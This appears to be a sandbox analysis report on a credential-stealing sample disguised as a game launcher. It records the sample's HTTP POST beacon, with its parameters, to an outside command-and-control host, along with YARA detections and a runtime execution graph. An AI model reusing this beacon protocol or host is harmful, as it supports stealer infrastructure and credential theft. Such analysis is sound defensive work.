                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7f8e88c435d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1755&sent=351&recv=612&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590135&delivery_rate=1606160&cwnd=128&unsent_bytes=0&cid=cbfab3e7a3453f27&ts=2811&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449738104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:17 UTC266OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 86
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:17 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d 26 68 77 69 64 3d 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@saschkaq&j=&hwid=8DA078FD107AA3B7C3D9BBD8FB1FB453
                                                                                              2024-11-23 14:06:18 UTC1027INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=ki7cue64o6tvu2j2kre9lc11lc; expires=Wed, 19-Mar-2025 07:52:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qakj7UN7Wjk34m%2FZmHn%2BoDD1t4WEbLtUM16uw%2BgyTu%2FM9B%2F%2FOftbMQK3TKuiR1ilW4kUq1wivao618PNMFFoCki%2FnD%2FUhXYnY7Nr4OwhonXeOxDpnHOFP1ZGAc%2FXys1%2FQbfuaXk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b812cd72c475-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=988&delivery_rate=1691772&cwnd=177&unsent_bytes=0&cid=9d0f2c9e0fc50d1f&ts=708&x=0"
                                                                                              2024-11-23 14:06:18 UTC126INData Raw: 37 38 0d 0a 51 77 33 42 7a 52 44 48 45 5a 7a 37 56 44 47 6f 4e 55 33 5a 74 42 44 68 34 59 70 62 4c 66 77 74 65 63 75 2f 68 68 2b 2f 4b 37 73 59 64 75 4f 34 4d 76 30 7a 39 49 38 67 51 5a 4a 70 59 6f 57 62 49 64 58 57 70 47 38 59 30 68 6c 4f 35 59 65 33 51 35 42 49 31 43 31 6c 72 72 35 6b 36 58 54 6b 6e 6e 59 64 69 6c 4d 35 2b 34 34 67 7a 63 50 76 65 52 66 4d 55 43 51 3d 0d 0a
                                                                                              Data Ascii: 78Qw3BzRDHEZz7VDGoNU3ZtBDh4YpbLfwtecu/hh+/K7sYduO4Mv0z9I8gQZJpYoWbIdXWpG8Y0hlO5Ye3Q5BI1C1lrr5k6XTknnYdilM5+44gzcPveRfMUCQ=
                                                                                              2024-11-23 14:06:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:09:05:56
                                                                                              Start date:23/11/2024
                                                                                              Path:C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
                                                                                              Imagebase:0x6b0000
                                                                                              File size:495'616 bytes
                                                                                              MD5 hash:FAD119B9DB79CCBFE3A65A13F0822B22
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:09:05:56
                                                                                              Start date:23/11/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:09:05:57
                                                                                              Start date:23/11/2024
                                                                                              Path:C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
                                                                                              Imagebase:0x6b0000
                                                                                              File size:495'616 bytes
                                                                                              MD5 hash:FAD119B9DB79CCBFE3A65A13F0822B22
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:4%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:3.5%
                                                                                                Total number of Nodes:1663
                                                                                                Total number of Limit Nodes:24
                                                                                                execution_graph 8843 6c56e2 8844 6c56ee __FrameHandler3::FrameUnwindToState 8843->8844 8869 6c508f 8844->8869 8846 6c56f5 8847 6c584e 8846->8847 8856 6c571f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 8846->8856 8908 6c5444 IsProcessorFeaturePresent 8847->8908 8849 6c5855 8850 6c585b 8849->8850 8851 6c6ed5 21 API calls 8849->8851 8912 6c6eeb 8850->8912 8851->8850 8854 6c573e 8855 6c57bf 8880 6c7a56 8855->8880 8856->8854 8856->8855 8893 6c6f1f 8856->8893 8859 6c57c5 8884 6bcd90 8859->8884 8862 6c53ec CallUnexpected GetModuleHandleW 8863 6c57e6 8862->8863 8863->8849 8864 6c57ea 8863->8864 8865 6c57f3 8864->8865 8899 6c6f01 8864->8899 8902 6c50c8 8865->8902 8870 6c5098 8869->8870 8915 6c5200 IsProcessorFeaturePresent 8870->8915 8874 6c50a9 8875 6c50ad 8874->8875 8925 6c6a60 8874->8925 8875->8846 8878 6c50c4 8878->8846 8881 6c7a5f 8880->8881 8882 6c7a64 8880->8882 8997 6c7b7f 8881->8997 8882->8859 9679 6bce30 8884->9679 8891 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 8892 6bce24 8891->8892 8892->8862 8894 6c6f35 __FrameHandler3::FrameUnwindToState __strnicoll 8893->8894 8894->8855 8895 6ca00a _unexpected 48 API calls 8894->8895 8898 6c847c 8895->8898 8896 6c835d CallUnexpected 48 API calls 8897 6c84a6 8896->8897 8898->8896 8900 6c7020 CallUnexpected 21 API calls 8899->8900 8901 6c6f0c 8900->8901 8901->8865 8903 6c50d4 8902->8903 8907 6c50ea 8903->8907 10066 6c6a72 8903->10066 8905 6c50e2 8906 6c60ca ___scrt_uninitialize_crt 7 API calls 8905->8906 8906->8907 8907->8854 8909 6c545a std::_Xinvalid_argument CallUnexpected 8908->8909 8910 6c5505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8909->8910 8911 6c5550 CallUnexpected 8910->8911 8911->8849 8913 6c7020 CallUnexpected 21 API calls 8912->8913 8914 6c5863 8913->8914 8916 6c50a4 8915->8916 8917 6c60ab 8916->8917 8934 6c9706 8917->8934 8921 6c60bc 8922 6c60c7 8921->8922 8948 6c9742 8921->8948 8922->8874 8924 6c60b4 8924->8874 8988 6cb105 8925->8988 8928 6c60ca 8929 6c60dd 8928->8929 8930 6c60d3 8928->8930 8929->8875 8931 6c8811 ___vcrt_uninitialize_ptd 6 API calls 8930->8931 8932 6c60d8 8931->8932 8933 6c9742 ___vcrt_uninitialize_locks DeleteCriticalSection 8932->8933 8933->8929 8935 6c970f 8934->8935 8937 6c9738 8935->8937 8938 6c60b0 8935->8938 8952 6cdc17 8935->8952 8939 6c9742 ___vcrt_uninitialize_locks DeleteCriticalSection 8937->8939 8938->8924 8940 6c87de 8938->8940 8939->8938 8969 6cdb28 8940->8969 8945 6c880e 8945->8921 8947 6c87f3 8947->8921 8949 6c976c 8948->8949 8950 6c974d 8948->8950 8949->8924 8951 6c9757 DeleteCriticalSection 8950->8951 8951->8949 8951->8951 8957 6cdca9 8952->8957 8955 6cdc4f InitializeCriticalSectionAndSpinCount 8956 6cdc3a 8955->8956 8956->8935 8958 6cdc31 8957->8958 8961 6cdcca 8957->8961 8958->8955 8958->8956 8960 6cdd32 GetProcAddress 8960->8958 8961->8958 8961->8960 8962 6cdd23 8961->8962 8964 6cdc5e LoadLibraryExW 8961->8964 8962->8960 8963 6cdd2b FreeLibrary 8962->8963 8963->8960 8965 6cdc75 GetLastError 8964->8965 8966 6cdca5 8964->8966 8965->8966 8967 6cdc80 ___vcrt_FlsFree 8965->8967 8966->8961 8967->8966 8968 6cdc96 LoadLibraryExW 8967->8968 8968->8961 8970 6cdca9 ___vcrt_FlsFree 5 API calls 8969->8970 8971 6cdb42 8970->8971 8972 6cdb5b TlsAlloc 8971->8972 8973 6c87e8 8971->8973 8973->8947 8974 6cdbd9 8973->8974 8975 6cdca9 ___vcrt_FlsFree 5 API calls 8974->8975 8976 6cdbf3 8975->8976 8977 6cdc0e TlsSetValue 8976->8977 8978 6c8801 8976->8978 8977->8978 8978->8945 8979 6c8811 8978->8979 8980 6c8821 8979->8980 8981 6c881b 8979->8981 8980->8947 8983 6cdb63 8981->8983 8984 6cdca9 ___vcrt_FlsFree 5 API calls 8983->8984 8985 6cdb7d 8984->8985 8986 6cdb95 TlsFree 8985->8986 8987 6cdb89 8985->8987 8986->8987 8987->8980 8989 6cb115 8988->8989 8990 6c50b6 8988->8990 8989->8990 8992 6ca732 8989->8992 8990->8878 8990->8928 8996 6ca739 8992->8996 8993 6ca77c GetStdHandle 8993->8996 8994 6ca7de 8994->8989 8995 6ca78f GetFileType 8995->8996 8996->8993 8996->8994 8996->8995 8998 6c7b88 8997->8998 9001 6c7b9e 8997->9001 8998->9001 9003 6c7ac0 8998->9003 9000 6c7b95 9000->9001 9020 6c7c8d 9000->9020 9001->8882 9004 6c7acc 9003->9004 9005 6c7ac9 9003->9005 9029 6ca880 9004->9029 9005->9000 9010 6c7add 9013 6cb0cb __freea 14 API calls 9010->9013 9011 6c7ae9 9056 6c7bab 9011->9056 9015 6c7ae3 9013->9015 9015->9000 9016 6cb0cb __freea 14 API calls 9017 6c7b0d 9016->9017 9018 6cb0cb __freea 14 API calls 9017->9018 9019 6c7b13 9018->9019 9019->9000 9021 6c7cfe 9020->9021 9027 6c7c9c 9020->9027 9021->9001 9022 6cd131 WideCharToMultiByte ___scrt_uninitialize_crt 9022->9027 9023 6cb807 __strnicoll 14 API calls 9023->9027 9024 6c7d02 9025 6cb0cb __freea 14 API calls 9024->9025 9025->9021 9027->9021 9027->9022 9027->9023 9027->9024 9028 6cb0cb __freea 14 API calls 9027->9028 9464 6cd304 9027->9464 9028->9027 9030 6ca889 9029->9030 9031 6c7ad2 9029->9031 9078 6ca0c5 9030->9078 9035 6cd22d GetEnvironmentStringsW 9031->9035 9036 6c7ad7 9035->9036 9037 6cd245 9035->9037 9036->9010 9036->9011 9038 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9037->9038 9039 6cd262 9038->9039 9040 6cd26c FreeEnvironmentStringsW 9039->9040 9041 6cd277 9039->9041 9040->9036 9042 6cbc45 15 API calls 9041->9042 9043 6cd27e 9042->9043 9044 6cd286 9043->9044 9045 6cd297 9043->9045 9047 6cb0cb __freea 14 API calls 9044->9047 9046 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9045->9046 9048 6cd2a7 9046->9048 9049 6cd28b FreeEnvironmentStringsW 9047->9049 9050 6cd2ae 9048->9050 9051 6cd2b6 9048->9051 9049->9036 9052 6cb0cb __freea 14 API calls 9050->9052 9053 6cb0cb __freea 14 API calls 9051->9053 9054 6cd2b4 FreeEnvironmentStringsW 9052->9054 9053->9054 9054->9036 9057 6c7bc0 9056->9057 9058 6cb807 __strnicoll 14 API calls 9057->9058 9059 6c7be7 9058->9059 9060 6c7bef 9059->9060 9069 6c7bf9 9059->9069 9061 6cb0cb __freea 14 API calls 9060->9061 9077 6c7af0 9061->9077 9062 6c7c56 9063 6cb0cb __freea 14 API calls 9062->9063 9063->9077 9064 6cb807 __strnicoll 14 API calls 9064->9069 9065 6c7c65 9454 6c7b50 9065->9454 9069->9062 9069->9064 9069->9065 9071 6c7c80 9069->9071 9073 6cb0cb __freea 14 API calls 9069->9073 9445 6c96ac 9069->9445 9070 6cb0cb __freea 14 API calls 9072 6c7c72 9070->9072 9460 6c7d96 IsProcessorFeaturePresent 9071->9460 9075 6cb0cb __freea 14 API calls 9072->9075 9073->9069 9075->9077 9076 6c7c8c 9077->9016 9079 6ca0d6 9078->9079 9080 6ca0d0 9078->9080 9082 6c9bcf __strnicoll 6 API calls 9079->9082 9084 6ca0dc 9079->9084 9081 6c9b90 __strnicoll 6 API calls 9080->9081 9081->9079 9083 6ca0f0 9082->9083 9083->9084 9086 6cb807 __strnicoll 14 API calls 9083->9086 9102 6ca0e1 9084->9102 9125 6c835d 9084->9125 9088 6ca100 9086->9088 9089 6ca11d 9088->9089 9090 6ca108 9088->9090 9092 6c9bcf __strnicoll 6 API calls 9089->9092 9091 6c9bcf __strnicoll 6 API calls 9090->9091 9093 6ca114 9091->9093 9094 6ca129 9092->9094 9097 6cb0cb __freea 14 API calls 9093->9097 9095 6ca13c 9094->9095 9096 6ca12d 9094->9096 9099 6ca31c __strnicoll 14 API calls 9095->9099 9098 6c9bcf __strnicoll 6 API calls 9096->9098 9097->9084 9098->9093 9100 6ca147 9099->9100 9101 6cb0cb __freea 14 API calls 9100->9101 9101->9102 9103 6cacc3 9102->9103 9104 6caced 9103->9104 9269 6cab4f 9104->9269 9107 6cad06 9107->9031 9110 6cad2d 9283 6ca94a 9110->9283 9111 6cad1f 9112 6cb0cb __freea 14 API calls 9111->9112 9112->9107 9115 6cad65 9116 6cb757 __strnicoll 14 API calls 9115->9116 9118 6cad6a 9116->9118 9117 6cad80 9119 6cadac 9117->9119 9123 6cb0cb __freea 14 API calls 9117->9123 9120 6cb0cb __freea 14 API calls 9118->9120 9121 6cadf5 9119->9121 9294 6cb07e 9119->9294 9120->9107 9122 6cb0cb __freea 14 API calls 9121->9122 9122->9107 9123->9119 9134 6cb1bc 9125->9134 9128 6c8377 IsProcessorFeaturePresent 9132 6c8362 9128->9132 9129 6c6eeb CallUnexpected 21 API calls 9129->9132 9132->9125 9132->9128 9132->9129 9133 6c8839 9132->9133 9137 6cb1e3 9132->9137 9164 6c7dca 9132->9164 9170 6c883a 9132->9170 9184 6cb43f 9134->9184 9138 6cb1ef __FrameHandler3::FrameUnwindToState 9137->9138 9139 6ca15b __strnicoll 14 API calls 9138->9139 9140 6cb23f 9138->9140 9141 6cb251 CallUnexpected 9138->9141 9146 6cb220 CallUnexpected 9138->9146 9139->9146 9142 6cb757 __strnicoll 14 API calls 9140->9142 9143 6cb287 CallUnexpected 9141->9143 9198 6c8161 EnterCriticalSection 9141->9198 9144 6cb244 9142->9144 9149 6cb2c4 9143->9149 9150 6cb3c1 9143->9150 9160 6cb2f2 9143->9160 9195 6c7d69 9144->9195 9146->9140 9146->9141 9163 6cb229 9146->9163 9149->9160 9199 6ca00a GetLastError 9149->9199 9152 6cb3cc 9150->9152 9230 6c8178 LeaveCriticalSection 9150->9230 9154 6c6eeb CallUnexpected 21 API calls 9152->9154 9156 6cb3d4 9154->9156 9157 6ca00a _unexpected 48 API calls 9161 6cb347 9157->9161 9159 6ca00a _unexpected 48 API calls 9159->9160 9226 6cb36d 9160->9226 9162 6ca00a _unexpected 48 API calls 9161->9162 9161->9163 9162->9163 9163->9132 9165 6c7de6 std::_Xinvalid_argument CallUnexpected 9164->9165 9166 6c7e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9165->9166 9167 6c7ee3 CallUnexpected 9166->9167 9253 6c4241 9167->9253 9169 6c7f01 9169->9132 9171 6c8846 GetLastError 9170->9171 9172 6c8843 9170->9172 9261 6cdb9e 9171->9261 9172->9132 9175 6c88c0 SetLastError 9175->9132 9176 6cdbd9 ___vcrt_FlsSetValue 6 API calls 9177 6c8874 __CreateFrameInfo 9176->9177 9178 6c889c 9177->9178 9179 6cdbd9 ___vcrt_FlsSetValue 6 API calls 9177->9179 9183 6c887a 9177->9183 9180 6cdbd9 ___vcrt_FlsSetValue 6 API calls 9178->9180 9181 6c88b0 9178->9181 9179->9178 9180->9181 9266 6c83ac 9181->9266 9183->9175 9185 6cb44b __FrameHandler3::FrameUnwindToState 9184->9185 9190 6c8161 EnterCriticalSection 9185->9190 9187 6cb459 9191 6cb49b 9187->9191 9190->9187 9194 6c8178 LeaveCriticalSection 9191->9194 9193 6cb1e1 9193->9132 9194->9193 9231 6c809f 9195->9231 9198->9143 9200 6ca026 9199->9200 9201 6ca020 9199->9201 9203 6c9bcf __strnicoll 6 API calls 9200->9203 9205 6ca02a SetLastError 9200->9205 9202 6c9b90 __strnicoll 6 API calls 9201->9202 9202->9200 9204 6ca042 9203->9204 9204->9205 9207 6cb807 __strnicoll 14 API calls 9204->9207 9208 6ca0bf 9205->9208 9209 6ca0ba 9205->9209 9210 6ca057 9207->9210 9213 6c835d CallUnexpected 46 API calls 9208->9213 9209->9159 9211 6ca05f 9210->9211 9212 6ca070 9210->9212 9214 6c9bcf __strnicoll 6 API calls 9211->9214 9215 6c9bcf __strnicoll 6 API calls 9212->9215 9216 6ca0c4 9213->9216 9217 6ca06d 9214->9217 9218 6ca07c 9215->9218 9222 6cb0cb __freea 14 API calls 9217->9222 9219 6ca097 9218->9219 9220 6ca080 9218->9220 9223 6ca31c __strnicoll 14 API calls 9219->9223 9221 6c9bcf __strnicoll 6 API calls 9220->9221 9221->9217 9222->9205 9224 6ca0a2 9223->9224 9225 6cb0cb __freea 14 API calls 9224->9225 9225->9205 9227 6cb339 9226->9227 9228 6cb371 9226->9228 9227->9157 9227->9161 9227->9163 9252 6c8178 LeaveCriticalSection 9228->9252 9230->9152 9232 6c80b1 __strnicoll 9231->9232 9237 6c7f12 9232->9237 9238 6c7f29 9237->9238 9239 6c7f22 9237->9239 9241 6c8076 __strnicoll GetLastError SetLastError 9238->9241 9244 6c7f37 9238->9244 9240 6c8030 __strnicoll 16 API calls 9239->9240 9240->9238 9242 6c7f5e 9241->9242 9243 6c7d96 __strnicoll 11 API calls 9242->9243 9242->9244 9245 6c7f8e 9243->9245 9246 6c7fd7 9244->9246 9247 6c7fe3 9246->9247 9248 6c7ffa 9247->9248 9250 6c8013 __strnicoll 48 API calls 9247->9250 9249 6c7d75 9248->9249 9251 6c8013 __strnicoll 48 API calls 9248->9251 9249->9163 9250->9248 9251->9249 9252->9227 9254 6c4249 9253->9254 9255 6c424a IsProcessorFeaturePresent 9253->9255 9254->9169 9257 6c49f4 9255->9257 9260 6c4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9257->9260 9259 6c4ad7 9259->9169 9260->9259 9262 6cdca9 ___vcrt_FlsFree 5 API calls 9261->9262 9263 6cdbb8 9262->9263 9264 6cdbd0 TlsGetValue 9263->9264 9265 6c885b 9263->9265 9264->9265 9265->9175 9265->9176 9265->9183 9267 6cb0cb __freea 14 API calls 9266->9267 9268 6c83c4 9267->9268 9268->9183 9302 6ca8c8 9269->9302 9272 6cab70 GetOEMCP 9275 6cab99 9272->9275 9273 6cab82 9274 6cab87 GetACP 9273->9274 9273->9275 9274->9275 9275->9107 9276 6cbc45 9275->9276 9277 6cbc83 9276->9277 9281 6cbc53 __strnicoll 9276->9281 9279 6cb757 __strnicoll 14 API calls 9277->9279 9278 6cbc6e RtlAllocateHeap 9280 6cad17 9278->9280 9278->9281 9279->9280 9280->9110 9280->9111 9281->9277 9281->9278 9282 6c7207 __strnicoll 2 API calls 9281->9282 9282->9281 9284 6cab4f 50 API calls 9283->9284 9285 6ca96a 9284->9285 9286 6ca9a7 IsValidCodePage 9285->9286 9292 6caa6f 9285->9292 9293 6ca9c2 std::_Xinvalid_argument 9285->9293 9288 6ca9b9 9286->9288 9286->9292 9287 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9289 6cab4d 9287->9289 9290 6ca9e2 GetCPInfo 9288->9290 9288->9293 9289->9115 9289->9117 9290->9292 9290->9293 9292->9287 9342 6caed9 9293->9342 9295 6cb08a __FrameHandler3::FrameUnwindToState 9294->9295 9419 6c8161 EnterCriticalSection 9295->9419 9297 6cb094 9420 6cae18 9297->9420 9303 6ca8e6 9302->9303 9304 6ca8df 9302->9304 9303->9304 9305 6ca00a _unexpected 48 API calls 9303->9305 9304->9272 9304->9273 9306 6ca907 9305->9306 9310 6cd95d 9306->9310 9311 6ca91d 9310->9311 9312 6cd970 9310->9312 9314 6cd98a 9311->9314 9312->9311 9318 6cc179 9312->9318 9315 6cd99d 9314->9315 9316 6cd9b2 9314->9316 9315->9316 9339 6ca863 9315->9339 9316->9304 9319 6cc185 __FrameHandler3::FrameUnwindToState 9318->9319 9320 6ca00a _unexpected 48 API calls 9319->9320 9321 6cc18e 9320->9321 9322 6cc1d4 9321->9322 9331 6c8161 EnterCriticalSection 9321->9331 9322->9311 9324 6cc1ac 9332 6cc1fa 9324->9332 9329 6c835d CallUnexpected 48 API calls 9330 6cc1f9 9329->9330 9331->9324 9333 6cc1bd 9332->9333 9334 6cc208 __strnicoll 9332->9334 9336 6cc1d9 9333->9336 9334->9333 9335 6cbfae __strnicoll 14 API calls 9334->9335 9335->9333 9337 6c8178 CallUnexpected LeaveCriticalSection 9336->9337 9338 6cc1d0 9337->9338 9338->9322 9338->9329 9340 6ca00a _unexpected 48 API calls 9339->9340 9341 6ca868 9340->9341 9341->9316 9343 6caf01 GetCPInfo 9342->9343 9344 6cafca 9342->9344 9343->9344 9350 6caf19 9343->9350 9346 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9344->9346 9348 6cb07c 9346->9348 9348->9292 9353 6cbced 9350->9353 9352 6cded4 52 API calls 9352->9344 9354 6ca8c8 __strnicoll 48 API calls 9353->9354 9355 6cbd0d 9354->9355 9373 6cbdee 9355->9373 9357 6cbdc1 9376 6cbccd 9357->9376 9358 6cbd3a 9358->9357 9361 6cbc45 15 API calls 9358->9361 9363 6cbdc9 9358->9363 9364 6cbd5f std::_Xinvalid_argument __alloca_probe_16 9358->9364 9359 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9362 6caf81 9359->9362 9361->9364 9368 6cded4 9362->9368 9363->9359 9364->9357 9365 6cbdee ___scrt_uninitialize_crt MultiByteToWideChar 9364->9365 9366 6cbda8 9365->9366 9366->9357 9367 6cbdaf GetStringTypeW 9366->9367 9367->9357 9369 6ca8c8 __strnicoll 48 API calls 9368->9369 9370 6cdee7 9369->9370 9382 6cdf1d 9370->9382 9380 6cbe18 9373->9380 9377 6cbcd9 9376->9377 9378 6cbcea 9376->9378 9377->9378 9379 6cb0cb __freea 14 API calls 9377->9379 9378->9363 9379->9378 9381 6cbe0a MultiByteToWideChar 9380->9381 9381->9358 9383 6cdf38 9382->9383 9384 6cbdee ___scrt_uninitialize_crt MultiByteToWideChar 9383->9384 9387 6cdf7c 9384->9387 9385 6ce0f7 9386 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9385->9386 9388 6cafa2 9386->9388 9387->9385 9389 6cbc45 15 API calls 9387->9389 9391 6cdfa2 __alloca_probe_16 9387->9391 9402 6ce04a 9387->9402 9388->9352 9389->9391 9390 6cbccd __freea 14 API calls 9390->9385 9392 6cbdee ___scrt_uninitialize_crt MultiByteToWideChar 9391->9392 9391->9402 9393 6cdfeb 9392->9393 9393->9402 9410 6c9c5c 9393->9410 9396 6ce059 9398 6ce0e2 9396->9398 9399 6cbc45 15 API calls 9396->9399 9403 6ce06b __alloca_probe_16 9396->9403 9397 6ce021 9401 6c9c5c 6 API calls 9397->9401 9397->9402 9400 6cbccd __freea 14 API calls 9398->9400 9399->9403 9400->9402 9401->9402 9402->9390 9403->9398 9404 6c9c5c 6 API calls 9403->9404 9405 6ce0ae 9404->9405 9405->9398 9416 6cd131 9405->9416 9407 6ce0c8 9407->9398 9408 6ce0d1 9407->9408 9409 6cbccd __freea 14 API calls 9408->9409 9409->9402 9411 6c9f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9410->9411 9412 6c9c67 9411->9412 9413 6c9cb9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9412->9413 9414 6c9c6d 9412->9414 9415 6c9cad LCMapStringW 9413->9415 9414->9396 9414->9397 9414->9402 9415->9414 9418 6cd144 ___scrt_uninitialize_crt 9416->9418 9417 6cd182 WideCharToMultiByte 9417->9407 9418->9417 9419->9297 9430 6ca7e2 9420->9430 9422 6cae3a 9423 6ca7e2 48 API calls 9422->9423 9424 6cae59 9423->9424 9425 6cae80 9424->9425 9426 6cb0cb __freea 14 API calls 9424->9426 9427 6cb0bf 9425->9427 9426->9425 9444 6c8178 LeaveCriticalSection 9427->9444 9429 6cb0ad 9429->9121 9431 6ca7f3 9430->9431 9440 6ca7ef CatchIt 9430->9440 9432 6ca7fa 9431->9432 9436 6ca80d std::_Xinvalid_argument 9431->9436 9433 6cb757 __strnicoll 14 API calls 9432->9433 9434 6ca7ff 9433->9434 9435 6c7d69 __strnicoll 48 API calls 9434->9435 9435->9440 9437 6ca83b 9436->9437 9438 6ca844 9436->9438 9436->9440 9439 6cb757 __strnicoll 14 API calls 9437->9439 9438->9440 9442 6cb757 __strnicoll 14 API calls 9438->9442 9441 6ca840 9439->9441 9440->9422 9443 6c7d69 __strnicoll 48 API calls 9441->9443 9442->9441 9443->9440 9444->9429 9446 6c96ba 9445->9446 9448 6c96c8 9445->9448 9446->9448 9452 6c96e0 9446->9452 9447 6cb757 __strnicoll 14 API calls 9449 6c96d0 9447->9449 9448->9447 9450 6c7d69 __strnicoll 48 API calls 9449->9450 9451 6c96da 9450->9451 9451->9069 9452->9451 9453 6cb757 __strnicoll 14 API calls 9452->9453 9453->9449 9455 6c7b7a 9454->9455 9456 6c7b5d 9454->9456 9455->9070 9457 6c7b74 9456->9457 9458 6cb0cb __freea 14 API calls 9456->9458 9459 6cb0cb __freea 14 API calls 9457->9459 9458->9456 9459->9455 9461 6c7da2 9460->9461 9462 6c7dca CallUnexpected 8 API calls 9461->9462 9463 6c7db7 GetCurrentProcess TerminateProcess 9462->9463 9463->9076 9465 6cd30f 9464->9465 9466 6cd320 9465->9466 9470 6cd333 ___from_strstr_to_strchr 9465->9470 9467 6cb757 __strnicoll 14 API calls 9466->9467 9468 6cd325 9467->9468 9468->9027 9469 6cd54a 9471 6cb757 __strnicoll 14 API calls 9469->9471 9470->9469 9472 6cd353 9470->9472 9473 6cd54f 9471->9473 9527 6cd56f 9472->9527 9476 6cb0cb __freea 14 API calls 9473->9476 9476->9468 9477 6cd397 9514 6cd383 9477->9514 9531 6cd589 9477->9531 9478 6cd399 9481 6cb807 __strnicoll 14 API calls 9478->9481 9478->9514 9479 6cd375 9486 6cd37e 9479->9486 9487 6cd392 9479->9487 9483 6cd3a7 9481->9483 9485 6cb0cb __freea 14 API calls 9483->9485 9484 6cb0cb __freea 